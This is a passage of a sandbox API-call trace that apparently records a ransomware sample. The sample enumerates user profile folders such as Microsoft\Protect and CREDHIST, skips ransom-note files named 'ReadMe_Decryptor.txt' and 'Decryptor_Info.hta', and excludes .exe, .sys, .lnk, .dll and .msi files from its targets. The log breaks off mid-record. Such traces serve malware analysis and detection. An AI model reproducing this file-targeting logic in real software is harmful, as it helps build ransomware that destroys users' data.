ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x33c0ebb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.011] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x33c0ebb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x33c0ebb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0082.011] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0082.011] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x510b16f0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x510b16f0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0082.011] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0082.011] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0082.011] lstrlenW (lpString="Proof") returned 5 [0082.011] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Proof" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof" [0082.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" [0082.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0082.012] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0082.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.428] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x510b16f0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x510b16f0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.430] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x510b16f0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x510b16f0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0082.430] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0082.430] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x541f1c70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x541f1c70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0082.430] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0082.430] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0082.430] lstrlenW (lpString="Protect") returned 7 [0082.430] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Protect" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect" [0082.431] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0082.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0082.431] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0082.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.434] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x541f1c70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x541f1c70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.435] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.435] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.435] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0082.436] lstrcmpW (lpString1="CREDHIST", lpString2=".") returned 1 [0082.436] lstrcmpW (lpString1="CREDHIST", lpString2="..") returned 1 [0082.436] lstrcmpiW (lpString1="CREDHIST", lpString2="ReadMe_Decryptor.txt") returned -1 [0082.436] lstrcmpiW (lpString1="CREDHIST", lpString2="Decryptor_Info.hta") returned -1 [0082.436] PathFindExtensionW (pszPath="CREDHIST") returned="" [0082.436] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0082.436] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0082.436] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0082.436] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0082.436] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0082.436] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0082.436] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0082.436] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0082.436] lstrlenW (lpString="S-1-5-21-3111613574-2524581245-2586426736-500") returned 45 [0082.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3111613574-2524581245-2586426736-500" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0082.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0082.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0082.436] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0082.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.582] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.584] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.584] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.585] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0082.585] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2=".") returned 1 [0082.585] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="..") returned 1 [0082.585] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="ReadMe_Decryptor.txt") returned -1 [0082.585] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Decryptor_Info.hta") returned -1 [0082.585] PathFindExtensionW (pszPath="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned="" [0082.585] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0082.585] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0082.585] lstrcmpW (lpString1="Preferred", lpString2=".") returned 1 [0082.585] lstrcmpW (lpString1="Preferred", lpString2="..") returned 1 [0082.585] lstrcmpiW (lpString1="Preferred", lpString2="ReadMe_Decryptor.txt") returned -1 [0082.585] lstrcmpiW (lpString1="Preferred", lpString2="Decryptor_Info.hta") returned 1 [0082.585] PathFindExtensionW (pszPath="Preferred") returned="" [0082.585] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0082.585] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0082.586] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0082.586] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0082.586] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0082.586] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0082.587] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x89f07f80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x89f07f80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0082.587] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0082.587] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0082.587] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0082.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0082.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0082.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0082.588] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0083.218] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.218] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x89f07f80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x89f07f80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.221] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf923e050, ftCreationTime.dwHighDateTime=0x1d3aab9, ftLastAccessTime.dwLowDateTime=0xf923e050, ftLastAccessTime.dwHighDateTime=0x1d3aab9, ftLastWriteTime.dwLowDateTime=0xf923e050, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="02540a10-7eb7-4b20-a8c7-470f8986389c", cAlternateFileName="02540A~1")) returned 1 [0083.221] lstrcmpW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2=".") returned 1 [0083.221] lstrcmpW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="..") returned 1 [0083.221] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.221] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Decryptor_Info.hta") returned -1 [0083.221] PathFindExtensionW (pszPath="02540a10-7eb7-4b20-a8c7-470f8986389c") returned="" [0083.221] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.221] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.221] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.221] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.221] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.221] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xdc5ea830, ftCreationTime.dwHighDateTime=0x1d41fce, ftLastAccessTime.dwLowDateTime=0xdc5ea830, ftLastAccessTime.dwHighDateTime=0x1d41fce, ftLastWriteTime.dwLowDateTime=0xdc5ea830, ftLastWriteTime.dwHighDateTime=0x1d41fce, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="0e15476d-d8fe-46ca-8099-ebdcf80f637c", cAlternateFileName="0E1547~1")) returned 1 [0083.221] lstrcmpW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2=".") returned 1 [0083.221] lstrcmpW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="..") returned 1 [0083.221] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.221] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Decryptor_Info.hta") returned -1 [0083.222] PathFindExtensionW (pszPath="0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned="" [0083.222] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.222] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf6409280, ftCreationTime.dwHighDateTime=0x1d4ae2c, ftLastAccessTime.dwLowDateTime=0xf6409280, ftLastAccessTime.dwHighDateTime=0x1d4ae2c, ftLastWriteTime.dwLowDateTime=0xf6409280, ftLastWriteTime.dwHighDateTime=0x1d4ae2c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="102a7bc8-3f85-4bb4-840a-38257d2965d2", cAlternateFileName="102A7B~1")) returned 1 [0083.222] lstrcmpW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2=".") returned 1 [0083.222] lstrcmpW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="..") returned 1 [0083.222] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.222] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Decryptor_Info.hta") returned -1 [0083.222] PathFindExtensionW (pszPath="102a7bc8-3f85-4bb4-840a-38257d2965d2") returned="" [0083.222] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.222] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.222] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542b0350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542b0350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x542b0350, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="2be989a0-16a1-424b-9211-51aa3bb43e5d", cAlternateFileName="2BE989~1")) returned 1 [0083.222] lstrcmpW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2=".") returned 1 [0083.222] lstrcmpW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="..") returned 1 [0083.222] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.222] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Decryptor_Info.hta") returned -1 [0083.223] PathFindExtensionW (pszPath="2be989a0-16a1-424b-9211-51aa3bb43e5d") returned="" [0083.223] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.223] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x89f07f80, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0x89f07f80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x89f07f80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", cAlternateFileName="915F9E~1")) returned 1 [0083.223] lstrcmpW (lpString1="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", lpString2=".") returned 1 [0083.223] lstrcmpW (lpString1="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", lpString2="..") returned 1 [0083.223] lstrcmpiW (lpString1="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.223] lstrcmpiW (lpString1="915f9e3b-485d-4f89-a291-82a5ad3b0ee7", lpString2="Decryptor_Info.hta") returned -1 [0083.223] PathFindExtensionW (pszPath="915f9e3b-485d-4f89-a291-82a5ad3b0ee7") returned="" [0083.223] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.223] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.223] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x17ffec90, ftCreationTime.dwHighDateTime=0x1d3373c, ftLastAccessTime.dwLowDateTime=0x17ffec90, ftLastAccessTime.dwHighDateTime=0x1d3373c, ftLastWriteTime.dwLowDateTime=0x18024df0, ftLastWriteTime.dwHighDateTime=0x1d3373c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbbe72db-afd8-443b-88dd-64b20388700d", cAlternateFileName="FBBE72~1")) returned 1 [0083.223] lstrcmpW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2=".") returned 1 [0083.223] lstrcmpW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="..") returned 1 [0083.223] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.224] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Decryptor_Info.hta") returned 1 [0083.224] PathFindExtensionW (pszPath="fbbe72db-afd8-443b-88dd-64b20388700d") returned="" [0083.224] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.224] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, 